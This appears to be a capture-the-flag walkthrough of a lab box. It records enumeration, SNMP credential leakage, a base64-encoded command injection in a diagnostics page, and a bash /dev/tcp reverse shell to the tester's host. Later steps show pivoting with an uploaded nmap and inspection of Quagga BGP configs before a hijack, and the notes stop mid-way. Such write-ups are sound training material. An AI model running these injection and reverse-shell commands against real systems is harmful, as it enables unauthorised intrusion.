
### nmap -sT -p 1-65535 10.10.10.105
### nmap -sU -AO -p 1-65535 10.10.10.105

TCP:
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login

UDP:
PORT    STATE         SERVICE
67/udp  open|filtered dhcps
161/udp open          snmp

### nmap -sU -p 161 -sV 10.10.10.105

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; pysnmp SNMPv3 server (public)

### snmpwalk -c public -v 1 10.10.10.105

Created directory: /var/lib/snmp/mib_indexes
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
End of MIB

### gobuster -u http://10.10.10.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -t 40

in /doc found diagram and error codes.

loged in using admin and serial number : admin:NET_45JDX23

in Diagnostics found strange things;
checked using Burp, found a value encoded with base64; after decoding it happens to be "quagga" which I can find on the site after clicking a button.
Tryed exploit to RCE.
### quagga; ping 10.10.14.71; ps quagga    encoded this string in base64
### tcpdump -i tun0 icmp                   on my computer
### entered encoded value to check parameter using burp. Got it

### root;bash -i >& /dev/tcp/10.10.14.71/4444 0>&1
Got user
### cat /proc/1/environ          -> because we are root, had to check if we are in a container
we are in lxc container
### python3 -c 'import pty; pty.spawn("/bin/bash");'
### Ctrl+Z
### stty raw -echo
### fg
### export TERM=xterm-256color
### clear




### netstat -alnp | grep LIST
no http service. This is odd
### cat /etc/lsb-release                ensure the type of OS
### ssh-keyscan localhost               ensure the right keys for SSH
### Ctrl+Z
### ssh-keyscan 10.10.10.105            ensure the right keys for SSH
keys are different
### arp -an                             says with who the box is talking
After reading tickets, we know that a very important FTP server is on 10.120.15.10
there is no 10.120.15.0/24 network on arp -an list
trying to ping that network
### ping 10.120.15.1                    everything is ok. 10.120.15.1 is a gateway
Now we'll install nmap on the box.
create a binary version of nmap
then supply it through SimpleHTTPServer
then scan network
### chmod +x ./nmap
### ./nmap -p 21 10.120.15.0/24
10.120.15.10 FTP is opened
check the version of FTP
### nc 10.120.15.10 21
ftp version vsFTPd 3.0.3                not vulnerable
### netstat -alnp | grep LIST           found a bunch of bgp services
### crontab -l                          look on running scripts. found one
### cat /opt/restore.sh
### cat /etc/quagga/zebra.conf          looks like a cisco config file
### cat /etc/quagga/bgpd.conf           BGP config file with BGP commands
### vtysh
BGP hijacking
looking on a photo in /doc directory on a web-server and looking on bgp commands we
can figure out in which network we are.
### show running-config
### show ip route 10.120.15.10
found out that we have to go through 10.78.11.2 in order to get to FTP server
###
